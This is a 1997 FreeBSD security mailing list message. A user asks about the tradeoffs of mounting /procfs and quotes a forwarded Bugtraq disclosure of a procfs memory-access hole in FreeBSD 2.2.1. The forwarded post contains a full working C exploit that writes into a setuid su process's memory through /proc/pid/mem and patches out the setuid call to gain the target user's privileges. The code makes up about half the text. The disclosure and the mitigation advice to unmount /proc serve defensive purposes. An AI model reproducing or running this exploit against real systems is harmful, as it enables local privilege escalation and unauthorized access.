From owner-freebsd-security Wed Aug 13 14:10:44 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id OAA27825 for security-outgoing; Wed, 13 Aug 1997 14:10:44 -0700 (PDT) Received: from kaori.communique.net (kaori.communique.net [204.27.67.55]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id OAA27820 for ; Wed, 13 Aug 1997 14:10:38 -0700 (PDT) Received: by kaori.communique.net with Internet Mail Service (5.0.1457.3) id ; Wed, 13 Aug 1997 16:10:37 -0500 Message-ID: From: Raul Zighelboim To: freebsd-security@FreeBSD.ORG Subject: RE: procfs hole (fwd) Date: Wed, 13 Aug 1997 16:10:34 -0500 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk What are the pro/cons of having a /procfs mounted ? Thanks. > -----Original Message----- > From: Ted Wisniewski [SMTP:ted@wiz.plymouth.edu] > Sent: Monday, August 11, 1997 10:05 PM > To: freebsd-security@FreeBSD.ORG > Subject: FW: procfs hole (fwd) > > I do not read this list... I want to be sure that someone was aware > of this.. > I have tested it myself and the only immediate cure is to not mount > the /proc filesystem..... I would encourage anyone with it mounted > to unmounted it (unless a patch is available to fix the problem).. > Below > is the original message and exploit. > > -----Original Message----- > From: Brian Mitchell [SMTP:brian@FIREHOUSE.NET] > Sent: Sunday, August 10, 1997 5:38 AM > To: BUGTRAQ@NETSPACE.ORG > Subject: procfs hole > > There is a major hole in procfs under FreeBSD 2.2.1 (2.1 is not > affected, > I have not tested 3.x but I believe it to be vulnerable as well) along > with OpenBSD (not tested by me, but by someone else -- believe it was > 2.1-RELEASE although obsd doesnt mount procfs by default like freebsd > does). > > The problem is all proc/#/mem access is controlled by the permissions > on > the file. This means you can fork() open the childs mem device and > then > have the child execute a setuid executable. Once this is done, you can > modify the setuid executables memory -- even segments that are > supposed to > be nonwritable can be modified. Enclosed is a simple exploit tested > under > FreeBSD 2.2.1 -- beware, this exploit is slow because it searches > memory > for a specific signature. Oh, you need to change your shell to a > borneish > shell too, since csh/tcsh will not work when euid != ruid (unless > passed > a -b script argument). > > BSDI is also believed to be vulnerable. Unfortunately, not only is > procfs > not mounted, it is not even in the GENERIC kernel. > > #include > #include > #include > #include > #include > > u_char search_code[13] = { > 0x8d, 0x05, 0x17, 0x00, 0x00, 0x00, /* leal 0x17, %eax */ > 0x9a, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00}; /* lcall 7,0 */ > > /* just do a xor %eax, %eax and then a ret */ > u_char new_code[] = { > 0x31, 0xc0, 0xc3}; > > main(int argc, char **argv) > { > int pid; > int fd; > char buff[40]; > char *user; > > /* might need to tweak these */ > u_int offset=0x8003000; > u_int offset_end = 0x8099000; > > if(argc < 2) > { > fprintf(stderr, "%s user\n", argv[0]); > exit(1); > } > printf("Demonstration of 4.4BSD procfs hole\n"); > printf("Brian Mitchell \n\n"); > printf("after you see \"setuid changed\", enter the pw for the > user\n"); > printf("\aBe warned, searching for the setuid() function takes > a long time!\n"); > user=argv[1]; > pid = fork(); > switch(pid) > { > case -1: > perror("fork"); > exit(1); > case 0: > /* give parent time to open /proc/pid/mem */ > sleep(3); > execl("/usr/bin/su", "su", user, NULL); > exit(0); > default: > sprintf(buff, "/proc/%d/mem", pid); > fd = open(buff, O_RDWR); > if(fd < 0) > { > perror("open procmem"); > wait(NULL); > exit(1); > } > /* wait for child to execute suid program */ > sleep(6); > /* stop the child */ > kill(pid, 17); > printf("searching - please be patient...\n"); > /* search for the setuid code */ > while(offset != offset_end) > { > lseek(fd, offset, SEEK_SET); > read(fd, buff, 13); > if(!bcmp(buff, search_code, 13)) > { > lseek(fd, offset, SEEK_SET); > write(fd, new_code, 3); > printf("setuid changed > (0x%x)\n", offset); > /* sigcont child */ > kill(pid, 19); > wait(NULL); > exit(0); > } > offset++; > } > printf("setuid not found!!\n"); > kill(pid, 9); > wait(NULL); > exit(1); > } > } > > > Brian Mitchell brian@firehouse.net > "BSD code sucks. Of course, everything else sucks far more." > - Theo de Raadt (OpenBSD President) > > > -- > | Ted Wisniewski INET: ted@oz.plymouth.edu > | > | Computer Services ted@wiz.plymouth.edu > | > | Plymouth State College tedw@psc.plymouth.edu > | > | Plymouth NH, 03264 HTTP: > http://oz.plymouth.edu/~ted/ |